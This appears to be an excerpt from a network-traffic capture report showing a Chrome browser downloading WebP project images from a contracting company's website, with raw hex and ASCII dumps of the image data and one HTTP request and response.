                                              2024-09-27 06:20:18 UTC7930INData Raw: 52 49 46 46 8c ec 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 18 ec 01 00 50 67 07 9d 01 2a cf 04 a3 03 3e e9 64 a8 4f a9 25 2c b4 2b 59 eb 32 80 1d 09 65 6e 50 d1 5b 3f 75 c4 37 f3 7b 1b ff 4a e5 e2 0f 1b 5e d9 ff 83 9e 1e 79 5f e6 e9 cb 6e 36 a0 e9 7e eb c0 75 3f da cf da dc 53 f9 db f0 bc 30 fd 27 fd 47 4a 1e 32 be e1 ff 47 a9 b3 3b 0f f2 f6 e5 67 d7 60 dd f8 4d b6 dd da 7b e4 3f 8e 24 6d a4 47 80 68 3f f2 1d f2 7d 4e ff 73 de 95 e7 1b ce 47 ce 83 a7 23 d7 1f a2 e7 d2 4b 7f ff a2 1f d0 3f f6 f9 bd fa af f9 7d f0 fe 9b ef 8d fc f7 b8 95 e1 fe 97 c0 ef ef ff cc 3f ed eb d7 fc df dc df 1b ff 6f fe d7 ff df a8 5f ea bf bd 7d 2c 7f 5f b6 03 6c ff 9b e8 1d f0 0f e6 ff fe 7a b0 4d 4f ed fd 40 ff bd 7f b8 fd c5 f7 6f c0
                                              Data Ascii: RIFFWEBPVP8XVP8 Pg*>dO%,+Y2enP[?u7{J^y_n6~u?S0'GJ2G;g`M{?$mGh?}NsG#K?}?o_},_lzMO@o
                                              2024-09-27 06:20:18 UTC8000INData Raw: ac 6b 61 6d ef 48 d0 f9 03 02 88 6e dc 40 97 22 af 55 90 45 37 0c 7b 25 f9 dd 3a bf 85 78 b1 96 ae 50 c7 37 2e 11 96 58 8f e4 26 6b 82 d8 09 11 ab af 6c 5f 96 3a a4 38 0f 28 bb 20 12 fb bf 74 be c4 dc af a2 e3 07 6c 90 95 92 23 35 a2 18 21 ff 0b a6 e6 b8 d1 01 ce 51 e1 48 4c 0e 46 94 0d 6b 34 91 d8 cf 96 ea c1 55 5a 7c cd 83 b3 97 a7 3c 1c 27 25 17 df bc 2f d1 7f 75 ef cc c0 84 34 c5 f2 4a ab a5 85 fd 10 97 9f 5f 4f 5b 18 d5 db 33 8c 98 02 1e 2d 2a 25 96 12 92 d0 97 36 de cb 88 2c 5b f0 9f f5 f2 2e 9c 6c 5d c5 d3 43 c9 1c 38 5c 71 b1 aa 57 2e 06 45 e0 88 01 30 b1 cc e3 ab 4b c9 a1 77 5a 24 db d2 03 a4 f1 6b b3 62 72 59 00 1b 7c cf 70 96 7f 53 d8 64 a2 0b 3b 9f 3c ac f9 6d 84 1d 7f 62 fd 3c c4 9f 2c 7b 74 a7 7a 65 98 9f 62 68 32 12 64 fc 63 eb ae 60 4e 29
                                              Data Ascii: kamHn@"UE7{%:xP7.X&kl_:8( tl#5!QHLFk4UZ|<'%/u4J_O[3-*%6,[.l]C8\qW.E0KwZ$kbrY|pSd;<mb<,{tzebh2dc`N)
                                              2024-09-27 06:20:18 UTC8000INData Raw: d9 02 15 26 1a 66 09 e0 07 10 2f 79 c0 36 33 e3 f7 c2 71 a2 45 b4 22 88 ad ba ec 23 35 6e 37 2c 08 84 c6 a2 1a 08 2d 8a 8b 3b 2f cf 57 16 8e 60 04 22 c6 e4 98 ef 6c 47 cf a5 a0 ad a4 90 18 31 16 9d d1 eb 96 66 2b 77 e7 b7 4f 6b 62 f6 5c d1 04 78 b1 e4 b8 1c e9 d0 a8 3f 80 d8 40 26 ab 10 49 8f f8 e0 31 45 02 af e6 11 88 2a e9 ee 36 11 03 43 04 71 f1 9b b7 ef 59 2f 1e f8 01 f1 e0 8c 43 94 66 8b a0 fc 50 02 7b ba a8 00 02 78 68 fd 42 05 e7 58 39 59 62 ce 83 74 8a 57 8f a1 08 f9 59 ae ce 94 03 77 a4 c7 7d d9 16 ff 22 99 fe 0a 08 77 ec 24 b5 f9 e5 c7 14 00 07 a9 1b 42 8d e9 f0 00 ca 89 76 0d 3e fb af 65 19 53 fb 96 55 60 62 74 34 08 b2 36 88 9c d3 28 72 48 a5 fe c4 99 97 c0 fb 77 ee 7f b2 6e 6f f1 c5 f9 58 1d e6 15 dc 82 98 21 96 91 e2 4f 78 93 c0 5c b8 23 31
                                              Data Ascii: &f/y63qE"#5n7,-;/W`"lG1f+wOkb\x?@&I1E*6CqY/CfP{xhBX9YbtWYw}"w$Bv>eSU`bt46(rHwnoX!Ox\#1
                                              2024-09-27 06:20:18 UTC8000INData Raw: 03 5a 51 78 89 45 61 d0 a2 80 14 ad 57 2e 44 ef 05 ab 2a e9 03 89 f5 25 cb db 4c 70 37 8d bd 97 e5 10 bb d5 61 e8 db ad ee ac 77 c8 4d 5b 44 f9 07 1b 96 7b 52 1e 6a e2 86 bc 3b 68 d2 55 82 38 bc 77 e1 f1 1b c4 d0 59 79 91 d8 d2 14 2f ea a9 86 ad d8 5a 34 c2 9a 80 c6 d7 8a a1 72 8a 48 27 76 0f 58 1a 98 95 a6 76 16 9e d6 20 1b 53 a2 e1 26 f8 b3 f3 2e 8c 48 d1 e3 ca 2b 53 68 c6 4a b9 72 a7 03 11 1a 37 96 ca 2b f2 e3 ae 34 16 51 26 8c 20 dc 52 76 7d 07 3f 80 d5 ad 94 4f 00 79 9c 91 c4 d7 49 05 b8 48 98 1c 49 7f e2 4a 94 02 2b ba b2 b3 99 9d 4d cf f3 68 ac 42 0b e3 c0 f5 ac bc 1b b5 03 d8 df f6 c7 d8 9e 01 3b 74 27 17 3a ac e6 42 07 f7 4e 8e 14 fb 8a 0d fb 01 e8 38 58 4c d8 0e 19 eb f9 15 99 07 c5 a5 59 b6 bb 72 1d c2 36 7a 98 9e 4e d9 74 7d d2 00 2c 45 1e 27
                                              Data Ascii: ZQxEaW.D*%Lp7awM[D{Rj;hU8wYy/Z4rH'vXv S&.H+ShJr7+4Q& Rv}?OyIHIJ+MhB;t':BN8XLYr6zNt},E'
                                              2024-09-27 06:20:18 UTC8000INData Raw: 3a 3c a7 16 35 d4 d5 cf fb 06 22 fa 75 c2 0b 31 d7 1c 03 3a f3 dc 01 f9 de cb ba da 01 d1 0c 75 1c ca 58 b1 28 eb 41 af 7a 72 7d 38 12 7f fa fb 1c b3 06 2e 99 8a cb 62 70 b8 a9 74 a5 69 36 ef b7 58 55 e2 1f c7 12 fa dc 57 88 77 fa a4 b5 4e 8d bd 8b 67 6a 30 36 ba 2e aa 47 a5 68 a2 5f 48 f5 b3 33 d9 2e 86 b5 65 a0 b7 7c 56 26 ed fa 05 55 b2 a3 ce 4f eb 8b 03 e1 17 dd a1 29 5b 5d 85 9e ae 94 54 94 9c c4 a7 d9 a7 e6 89 24 fe f6 fa 72 76 77 8c 91 32 eb 45 79 e8 d5 af 57 b7 c5 4f 28 74 9d 87 95 5d c0 fc ce 02 df 7c 22 77 ad 36 e4 bc df 3f e5 31 8e 78 43 df 06 1d 14 ae 50 3a 13 69 f7 20 19 cd 17 e0 42 99 7c 37 76 a5 f2 86 90 41 ab 6d 0d 80 85 64 72 c5 97 83 d4 e3 4c 2e 9c 89 2a fa c0 6d 62 1f 28 8f 15 2c ed e6 ba 0d 19 16 2a c8 97 b5 41 89 c6 f8 39 3c 9a 71 0f
                                              Data Ascii: :<5"u1:uX(Azr}8.bpti6XUWwNgj06.Gh_H3.e|V&UO)[]T$rvw2EyWO(t]|"w6?1xCP:i B|7vAmdrL.*mb(,*A9<q
                                              2024-09-27 06:20:18 UTC8000INData Raw: b7 ef 9d 98 dd 40 86 a3 20 1f e9 95 5f c5 c0 85 ee 69 08 56 8b 59 42 b9 1e fe c4 28 63 92 48 6c 29 fa 89 71 2e 10 d3 3a ed 10 7f de f2 55 f6 1d 73 78 bf 02 b8 31 2f a0 ae 5a 8f b8 9e 80 23 ce 3e 5f 85 b1 b5 00 62 28 eb 9f 8f 3e 80 01 47 58 8a 5a 50 a5 20 2a 9d e9 53 6e c4 11 12 96 c5 ff e1 df dc 36 f7 ab e2 eb 9f 2c 18 5f 8f de a4 0d 4f 8f 01 eb dc 36 bf 58 89 e3 39 04 17 be 76 24 66 be c0 78 29 12 27 f5 b8 e2 a8 e8 23 89 db 74 4b 4b 43 da 51 6d 02 9e 7f 8c 30 ba 22 7e a3 e7 fc c7 b8 3d 11 3d 53 d9 09 ed c7 52 df 24 88 dd 16 72 8a f3 46 ca 05 10 ca fa 63 d6 29 d7 f1 a2 42 dc 60 83 7d e8 93 4f 63 c8 da 02 3f fe 2e 32 dc 8c bd a2 86 6b 44 34 12 44 e2 19 f6 fe 1e 38 bc b4 38 02 7b dc 8a 75 dc f6 df d8 79 a0 dd 3c 56 07 6b 1a 7e 4a 87 2c e4 01 71 85 2a 1d b0
                                              Data Ascii: @ _iVYB(cHl)q.:Usx1/Z#>_b(>GXZP *Sn6,_O6X9v$fx)'#tKKCQm0"~==SR$rFc)B`}Oc?.2kD4D88{uy<Vk~J,q*
                                              2024-09-27 06:20:18 UTC8000INData Raw: fe f8 35 b9 24 7d 04 6b 4d 12 e7 f2 e4 f2 5a 30 30 95 04 1e 27 34 19 70 de b0 78 5b 88 78 2a 13 ec 90 98 14 cb 46 04 f3 63 01 c3 b2 1a 6b 10 72 17 c7 4f da 08 4f fd a3 f9 bc 32 61 12 5a 5d 25 14 ed aa 75 ef 62 7b 57 bc b2 06 92 f3 ec 56 90 9a da 2e e6 d0 9e 02 53 bf b7 be fa 42 eb 3a 45 65 87 25 0e 32 c9 65 27 98 ec 35 bc f2 21 f2 34 55 ef df 4e ef c0 38 09 d5 49 35 ac ac 5a 4a 22 34 43 b0 6b 9d 8a 0e b3 8e 96 1a 45 21 fe 2b ca 2c 1b 84 0e 7d ed 0f d3 0b 05 96 7c 44 60 34 94 42 9d d3 e1 0c d3 c6 3f a5 f8 55 30 ad 87 b3 bb 4f d1 19 1a e7 9a 1c 15 21 91 b1 1c bb d5 cf 82 9f 4c aa 15 f5 c1 0d fc 33 f2 c5 ff 21 59 e4 9d f0 fc fc be 46 9c 1a 1a 5f 71 d7 d9 31 0c b3 11 81 aa 4f 34 97 62 10 5e 0f b8 25 b2 8f ee e5 4f 61 31 06 6a 14 ab b3 ba 20 72 f0 50 fd bb cd
                                              Data Ascii: 5$}kMZ00'4px[x*FckrOO2aZ]%ub{WV.SB:Ee%2e'5!4UN8I5ZJ"4CkE!+,}|D`4B?U0O!L3!YF_q1O4b^%Oa1j rP
                                              2024-09-27 06:20:19 UTC8000INData Raw: 7f 5f cf ae 9f 06 1d a1 13 52 12 f8 bd 03 2b f0 f5 b1 5b 6a 91 6f b5 a1 e8 d8 4a ca c1 21 28 0d 03 cf 5f dc b9 ca e3 bd 40 67 17 bb 71 11 db 27 7a 60 d9 f9 e1 65 7b a6 c9 dd c3 ee f4 66 fe 98 8d 48 32 12 a8 30 da ef f4 b4 9a fc 4d 70 e9 a3 e0 fc e3 87 17 96 f1 94 84 e0 78 67 14 90 70 5f 6f d2 dc b0 89 ed 7f 69 96 be 83 c1 37 7f 0f 0e e4 e5 7b 7a d1 e8 73 46 4a 6f 0f 54 7b 2f fa a9 bb 54 37 f8 0b 39 44 50 1f a0 91 43 9f 95 93 83 e0 55 10 39 dd 0f 21 5c 7b 84 5e 26 a0 0a fa c6 a4 44 96 f0 b5 99 36 08 4b 7f c1 c8 01 aa 4b d8 7c 6d 9c d5 9c 35 26 91 c4 b6 90 1c 86 fd 3c b7 3c c1 8e 90 93 96 3e 2e b7 26 bd af 35 9c dc 5f 13 d6 22 b4 e2 f6 13 87 82 59 95 21 18 28 71 95 91 96 f5 07 60 28 85 2f ca 80 c9 6c 9c 46 3c a5 06 c4 50 23 f9 6f b7 82 da 07 32 10 20 2b f5
                                              Data Ascii: _R+[joJ!(_@gq'z`e{fH20Mpxgp_oi7{zsFJoT{/T79DPCU9!\{^&D6KK|m5&<<>.&5_"Y!(q`(/lF<P#o2 +
                                              2024-09-27 06:20:19 UTC8000INData Raw: 0f 5f ee 6b d1 27 29 af 2f ab 9b dd 8a 35 2f 59 ef 77 39 c6 d1 54 32 21 a0 f3 3c f1 79 99 98 98 cd ec c5 78 c3 48 7e d4 f6 4d 57 79 85 51 15 7a f4 e1 42 14 90 82 48 5c 93 a4 2a ff 56 45 56 6e 55 07 98 08 85 b3 68 c3 77 64 f9 38 2d 03 26 a9 c9 3b b1 59 8c b0 a7 c6 72 f0 7a ee 37 de 8f 38 df 5f 7e 6b 25 3c 8d 0e 1f 13 21 af ea d5 e9 9a 82 35 44 d1 3a 78 87 af 7b 4b 81 5d 1e 5a b6 c6 89 b3 25 dd 1a f9 25 2c 9e 98 fe de 9d 74 29 8d e6 fd 6f 13 33 c4 85 6c c2 32 ff b4 4a 51 9b 2b 4c 22 08 b2 1d 35 39 54 2c cf f6 d6 4e 44 5e 95 ef 6d a9 b9 42 e1 76 3e 2b c2 65 b5 23 4c e2 2d bf a2 45 ab 64 20 4f c4 a8 a8 8b b8 19 3b 82 43 0c 05 54 42 e2 32 88 f0 fd 1f 18 bc 89 cd 42 d9 42 40 fc 28 ec e9 ae 3f 08 0e 0e 95 73 a0 a4 19 c6 38 b2 e7 da d1 fc 49 7e ec 39 cf 6c a5 53
                                              Data Ascii: _k')/5/Yw9T2!<yxH~MWyQzBH\*VEVnUhwd8-&;Yrz78_~k%<!5D:x{K]Z%%,t)o3l2JQ+L"59T,ND^mBv>+e#L-Ed O;CTB2BB@(?s8I~9lS
                                              2024-09-27 06:20:19 UTC8000INData Raw: f0 ee 18 71 40 c0 3f e5 d3 1a e1 e1 e3 03 2d 6f c4 43 34 39 20 9d 6f 5d 48 d1 b0 0c 06 01 7b fd 02 81 0e 9a 2f ce 44 11 f3 94 80 bf 19 42 03 f6 be e1 28 39 14 e5 ea f2 f4 90 ba d8 bb c7 72 2c 65 f6 1a ee 50 71 1e 15 e1 d0 27 95 ad 14 fe a7 84 a2 43 37 23 93 31 45 a0 21 ea ce f3 35 cb fe 9a df 00 35 d3 17 b6 71 e7 36 12 a4 58 80 a0 92 14 e5 1d ec 53 f5 dc fb 20 03 67 8b b5 c2 8d 7c 30 db 6e 6b 73 c9 1d d0 56 65 0e 8b 06 eb 70 7f ba cb d6 47 05 13 34 d3 6d 6a 20 b5 9b 63 ae ca 95 be b6 84 f0 44 54 47 76 36 9f 8e 58 fb 61 0c f5 ce 97 44 d3 e0 50 01 01 38 a5 e4 85 6c 5e 04 bd 3e 5d 89 37 65 8e 56 67 a7 81 0f 23 a6 9f 14 86 8e b7 b0 bb 67 e6 23 aa 21 92 14 c7 68 d3 a2 78 42 24 23 28 cf 36 62 be fc d1 47 ce a1 d3 95 c1 a3 97 0e 0d ed a8 f4 83 1f ff a2 3d 86 c1
                                              Data Ascii: q@?-oC49 o]H{/DB(9r,ePq'C7#1E!55q6XS g|0nksVepG4mj cDTGv6XaDP8l^>]7eVg#g#!hxB$#(6bG=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              115192.168.2.465451173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:18 UTC724OUTGET /uploads/projects/27/90299ab973339b4f1441f267ea92a6d7.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:18 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:18 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 11:57:05 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 86384
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:18 UTC7931INData Raw: 52 49 46 46 68 51 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 f4 50 01 00 50 d8 05 9d 01 2a cf 04 a3 03 3e e9 6c ad 52 29 25 bf b3 25 98 fa eb f0 1d 09 65 41 af d8 92 53 fb ae 6a bb 57 90 6e f7 70 91 ea fc b3 ff 97 fb 27 e9 7a 6a 5e 6d 9e 7f ce c6 09 dc 79 de 24 3e aa 0d 7f df af fd 1e 20 cf 30 6f e8 6e 10 f3 df b3 85 be 3a 76 f5 9a 27 e5 df 9c 3f b1 fb df 60 0c bc fa fb 3b ff 85 ef f3 ea 67 fd 27 a3 7f a3 5f 54 3f da 3d 12 7e e9 fa c1 7a 88 fe f9 e8 e9 e9 69 eb 85 fd 8f d4 03 ce ef d7 1b fc fe 45 b7 ca bf f1 79 ea fa 07 f8 5e 02 fe 6b f6 ff f2 ff c6 fb 50 7e c7 9f 3f 81 ff 1b cd 5f b6 6e 99 f6 dd fd ff fe 5f f6 9f 90 fe b2 fe ef fc bf fe 6f f4 de c1 1f af 79 32 fe 97 72 36 ef ff 2b f7 0b d8 3b dd 4f bd fe d0 fa 9a
                                              Data Ascii: RIFFhQWEBPVP8XVP8 PP*>lR)%%eASjWnp'zj^my$> 0on:v'?`;g'_T?=~ziEy^kP~?_n_oy2r6+;O
                                              2024-09-27 06:20:18 UTC8000INData Raw: c4 0e eb 75 0d e8 93 75 37 32 c4 ea 0f 63 1d b2 ac 4a d7 9f 41 20 5f b8 67 ed f0 95 8d d4 b3 3b bc 00 91 08 e5 e0 69 d7 c3 08 27 48 e3 44 1c 29 73 22 bf 85 5f f4 bf b4 ea fe ac dd 1d 59 55 c9 5d ef 7b cf 21 56 9a 08 28 eb 1c 7e cb 69 c9 52 26 d2 01 95 db 26 2c f8 70 84 13 2a 42 a8 b5 e1 74 81 be b8 3a 1e d4 86 49 e1 ed 53 a4 28 39 39 cd d9 75 6b ff 8c 0d 5e db 58 f4 8a b2 ae 62 fc 9c 69 83 7a 65 e6 49 b2 48 ed de 64 61 c7 27 ab e6 6c 84 d2 92 d1 d8 17 c3 dd ed 58 b9 54 35 b8 0c 07 7b 9c 20 ae bd ba ee cc 0f da 11 78 3f 63 e1 03 05 b2 cb e1 88 4c 89 04 88 1a 61 d0 5b 20 89 62 fa d2 6a 6c 6b e5 a1 07 a6 56 3a 09 41 c0 5b 5b 61 6e 6b be 95 fa 60 d8 97 68 c6 5e 70 60 e7 89 f9 56 b7 74 4e 71 6a 5b 12 19 de 42 b9 51 80 0f 2e e7 83 8a c3 c8 04 e7 82 b0 cc 97 32
                                              Data Ascii: uu72cJA _g;i'HD)s"_YU]{!V(~iR&&,p*Bt:IS(99uk^XbizeIHda'lXT5{ x?cLa[ bjlkV:A[[ank`h^p`VtNqj[BQ.2
                                              2024-09-27 06:20:18 UTC8000INData Raw: dd 4c 17 0b c8 9e 71 0a 6c e3 00 77 5e 0c 58 03 d1 83 42 0e 41 b2 fa aa 80 00 7d 81 8e fd e3 27 e6 e6 2a 69 74 70 7e 93 d2 d6 4e 0f cc 70 fc 9a c4 9e 6c c0 1a e0 2d 0e 00 00 00 cf a0 00 04 28 1e e0 32 b6 a9 e5 3b f4 2e cd 54 c2 5c 2d 20 d4 e2 7f a9 b1 07 23 9b b0 48 1f ab e4 77 24 9f 18 44 a5 24 87 0a de 32 72 98 6d 56 70 23 76 07 b9 5d c7 ac 9c 1e 22 5d 8e 52 ea 57 32 29 8c 7f 41 49 a4 01 2b 15 a9 2a 73 3d c9 9c aa e5 3c 00 37 2d 6e 55 06 4b 8d f6 7c 05 91 f5 47 91 2e de 4d 3d ca 4b 8c 4b af 20 ca 9d ac 38 d1 59 2a 84 e9 e9 67 48 c7 a4 32 37 f6 c0 06 6d e2 4b f0 c2 00 7b 87 48 03 54 68 63 ab 53 1e a0 21 a6 7e 4a 3d a4 b0 00 00 4e a2 fd 14 a2 54 5a 7e ed 1b a9 79 02 d5 3f cb 98 e3 3a 73 26 c7 84 ef da 35 54 ae 70 e3 76 9f 3c e5 c3 f2 0c 05 c0 37 f8 80 97
                                              Data Ascii: Lqlw^XBA}'*itp~Npl-(2;.T\- #Hw$D$2rmVp#v]"]RW2)AI+*s=<7-nUK|G.M=KK 8Y*gH27mK{HThcS!~J=NTZ~y?:s&5Tpv<7
                                              2024-09-27 06:20:18 UTC8000INData Raw: 25 27 fa 80 9d cc 30 eb e2 30 d1 08 33 3b 48 9f c0 45 0b 67 10 9d 74 0f b2 d8 56 e5 fe 1d ee ec d3 de 35 9b 88 f8 6f 24 93 db b6 0a 95 61 85 40 42 aa 4b f1 10 7e 02 90 c4 9c 79 c4 61 88 89 68 71 76 05 d4 aa 14 bc d4 cf df 8b 59 78 f1 78 bc 73 2c 42 88 95 13 5b 23 03 c4 1b 05 95 84 82 11 15 9e f6 1a 19 43 87 40 77 37 fc 8b ae 8f c8 1a 5c c3 52 dc 69 be e1 c3 a8 92 e3 52 dc de b2 20 00 ee 75 84 48 91 23 21 f5 58 79 ae 80 c8 80 f4 c3 b1 dc 04 53 90 f1 f1 86 0a f0 74 f7 28 50 25 8e fd db 39 fc 54 30 24 b8 52 82 be 89 51 6e 9a 3d f5 22 e8 c4 00 48 21 db 01 2b 24 e5 5a f0 e8 87 85 12 7e 5c e8 ab 1c 50 7f 2c 03 88 aa 36 fd f7 48 47 b7 9b 9b cb 43 07 c4 9d f4 8f 0a 12 a5 61 3e 2d 38 0c 5c bb ac e1 f4 d5 91 cf 56 17 b8 85 9c 9f 8d 82 11 7d aa 59 e8 1a 6a 73 1e 06
                                              Data Ascii: %'003;HEgtV5o$a@BK~yahqvYxxs,B[#C@w7\RiR uH#!XySt(P%9T0$RQn="H!+$Z~\P,6HGCa>-8\V}Yjs
                                              2024-09-27 06:20:18 UTC8000INData Raw: ee bd b0 ea 4d 2f 6c 0a 24 cd 81 0e 40 8b d4 24 16 3a 55 41 e6 bd ea e7 c9 5d 53 1b a3 c6 5c 7b 5b 2e 2b e5 70 dd 8a 3f 83 58 80 92 60 0f bf c1 a9 00 6d e5 59 dd d4 ff 9e 32 d5 76 a9 72 7b 03 16 65 3d 71 83 a7 30 61 e6 c1 0f 80 ad e9 36 21 c1 7a 44 cd 4d 2f 15 d1 ec cc 75 33 de 58 33 4e 5b ee 0d a9 ea df 29 4e 42 00 02 b2 d2 0b 9e 46 44 44 cb bd 17 76 0f c2 8d 6e 88 0e 3c e0 ad bc 5b ec 21 e3 e8 35 a2 66 f2 d5 70 3b 71 1d 6c c2 be ce 0d 8e 8f 83 56 d3 56 9c cb d5 d9 4b bf 6e c1 64 a1 af 07 49 2c 94 54 5e b3 c8 49 23 fe fc 27 06 fe 42 74 e2 3a b9 94 43 c9 d0 60 be dd 82 ef b2 10 ed 8e 46 53 a2 7a 4a 45 4b 6d 15 f4 55 e1 a2 38 56 8c 12 06 b4 22 0c 18 b4 8f 19 6f b8 f1 e1 33 d3 e2 1c 4f c2 26 b3 e9 c1 ee 57 8b e4 0b 6c 0f e1 f6 56 af 79 0d 64 eb 29 f5 3c 99
                                              Data Ascii: M/l$@$:UA]S\{[.+p?X`mY2vr{e=q0a6!zDM/u3X3N[)NBFDDvn<[!5fp;qlVVKndI,T^I#'Bt:C`FSzJEKmU8V"o3O&WlVyd)<
                                              2024-09-27 06:20:18 UTC8000INData Raw: c9 4f 9d a0 4d 1b 1a a5 56 9a fa 0d 16 05 46 78 cb 98 ac 5b 9c c3 c1 25 65 35 f0 c4 83 16 e7 61 6d 66 d2 b9 5f f0 6f 16 03 0a 71 9e 67 7a cf 6d 80 d7 3f 76 9a 67 41 25 ab 10 c5 82 c4 d9 31 04 1e 85 ce fa 7c 7d 01 d0 e3 ec 5c f2 e3 84 6c d5 ce d6 06 57 25 99 68 60 97 f1 4d 02 42 b7 39 60 e5 53 95 ac de d0 50 74 23 07 ff de d9 bb b6 fb b2 99 19 31 bb f3 a2 a1 b2 c6 dd f4 ed eb 38 2b 7d d4 89 78 84 d9 f8 4a 4f 29 d4 d5 8b 62 ef ae a1 56 43 24 99 d2 9a e1 a8 a7 8a 7c 6e 26 20 b5 2a 0c 36 25 73 0c ab 6b 77 e0 23 43 a7 af 87 63 a0 9d 2e 1f 79 94 bf 1c 1a 6b a0 fe 4b ea 2f 55 e2 4c ec 6a 8f d4 3c 0e 40 98 1e 49 5c c3 13 9a 0b fb 17 2e 6b 00 bf 1e 4f 23 e1 6c 58 61 a2 64 cc 2a 70 c6 d9 2c 47 c7 45 4c 5e 0f 27 ce 65 a6 41 61 0e 2a 79 12 02 d4 ce 3c 2f bb fd 1f 7c
                                              Data Ascii: OMVFx[%e5amf_oqgzm?vgA%1|}\lW%h`MB9`SPt#18+}xJO)bVC$|n& *6%skw#Cc.ykK/ULj<@I\.kO#lXad*p,GEL^'eAa*y</|
                                              2024-09-27 06:20:18 UTC8000INData Raw: 48 fc a0 5c 87 95 b2 53 0b c4 21 3f f1 b7 eb cd b5 6c 32 ba f1 cf 1c e9 34 fe 5d c5 26 1c a9 76 2d 73 8e e0 7d a5 3e ee 7d 31 03 81 ee b3 1a d0 9f e9 35 89 8a 57 25 c8 8d 2a 26 0e a8 2e 05 8c dd fc a6 db 95 f8 25 bb 77 5b b4 4c 21 a3 a3 37 a8 42 ca ad be e4 90 e5 a0 42 d6 09 79 26 b1 df 13 e6 e7 d8 d1 d6 c0 57 9e 48 b8 bd 8c 8d fc c8 42 c5 07 fe 84 bd 8f eb e5 a0 9c 52 32 c7 78 4e 36 46 9a 59 b1 d4 8a b4 50 a3 b7 70 b2 b3 8e 27 8e 83 5e 40 c5 07 57 80 ca df c7 15 d8 58 cb b6 3e 4f 03 99 e5 53 e7 f4 5f aa 79 46 f6 ec 03 b6 bc 60 27 4d 33 f9 35 bc 1c 0a 69 1a 2e 40 3e b3 48 ba 43 1a c4 49 7d cf bc ed ab 0b 60 9d d2 08 08 45 c6 8a db d2 71 bd 09 26 fc b1 a4 a6 39 84 17 6a 61 4c 0b ae d1 50 12 23 6b 1e 6f 16 92 c1 f6 84 c5 cf ed ff de be 1a be 3c 8f 7f cc 85
                                              Data Ascii: H\S!?l24]&v-s}>}15W%*&.%w[L!7BBy&WHBR2xN6FYPp'^@WX>OS_yF`'M35i.@>HCI}`Eq&9jaLP#ko<
                                              2024-09-27 06:20:19 UTC8000INData Raw: f3 0b 28 69 b4 21 7c d3 1f fd 2b a0 d8 4b e0 34 d9 ef c2 e0 f2 7f 4f cb 1d 9b 95 97 b4 99 a2 bf 28 16 da 01 2e 07 a7 9f ff 5e e7 6c 38 d4 59 7b 48 ee 32 64 c3 0e e2 39 ed bd e2 9d 67 1e 28 b8 a0 9f e1 0e 61 79 17 34 69 0b 75 02 e9 69 d7 2d e8 4d 27 5d 4b 4b 65 c9 95 2d b1 75 1a 5b a8 c5 b2 d5 be 8f 1b a1 74 5c 2c 38 b8 9c c1 31 91 09 ff 09 b7 5d dd 01 76 33 62 63 64 ba cf e3 e8 67 42 aa 51 cf 8a 06 81 41 39 07 39 f6 29 cc 40 76 67 bd a4 3a 13 73 e0 53 a6 51 5a 17 cf 46 10 bf 22 ef eb 89 bd 68 24 1f ee 4b a1 53 6e 46 5a f5 bf b4 76 fc 84 e0 02 18 6b fe b1 54 3c 0b 1f 22 f8 8b 80 09 2d de 71 1b 4b de 94 b4 d1 e5 0c f9 4a f2 db a3 81 a7 a0 53 d0 65 1c 06 72 6f ce b8 3a 3e a0 30 ef ad 0f c5 79 43 30 88 e7 27 c0 0b cc cc a6 c3 b3 1a 1f da 50 57 09 65 e2 a5 ef
                                              Data Ascii: (i!|+K4O(.^l8Y{H2d9g(ay4iui-M']KKe-u[t\,81]v3bcdgBQA99)@vg:sSQZF"h$KSnFZvkT<"-qKJSero:>0yC0'PWe
                                              2024-09-27 06:20:19 UTC8000INData Raw: 75 c4 c8 94 5b 77 cb 27 6d 24 d4 9e 43 12 9f d1 66 3a 5b 00 83 9b ef b2 38 8a 6f ad 8d 40 92 57 a8 56 0c f5 51 45 69 a4 25 fc 47 78 51 12 fa 89 d5 ee e2 fd 94 b0 2f 41 5a df 69 9b 3b eb c6 0d f3 34 9f ff b6 1d be 4d 32 5e f0 3d d2 75 b9 9e 4c 06 07 c7 a4 8d ee 4a d6 0a 84 d1 16 8a 8a 44 cf ca d5 b5 5f cf 4e 4b f9 99 7e c3 51 b9 8a 69 12 f3 2c a5 4c cd cf 4e 0c a8 27 43 d0 bf 6f c2 bf 2b ea 6a dc ed 44 7d 06 8a 32 0b 62 07 ca f1 f3 68 ee 15 48 1b d1 cb aa 94 7f 3c 5b ee a7 a9 3f e7 98 56 06 26 7e 55 d6 1d 30 58 b4 71 e3 5c b2 98 7e db 4e 05 98 ec 1e 3d 91 a2 38 f2 ad f7 03 f5 8f 43 e7 a1 74 f7 46 c3 6a ef b5 fa 03 71 ef ad 9f 80 45 6f 3e 04 b2 b5 f4 2b 92 3c 57 89 54 e6 b0 36 84 7d a1 08 8e 82 00 8b 23 c0 92 6a 1d 22 c7 5d 65 b2 14 8c 4d f0 6b 28 47 0c ac
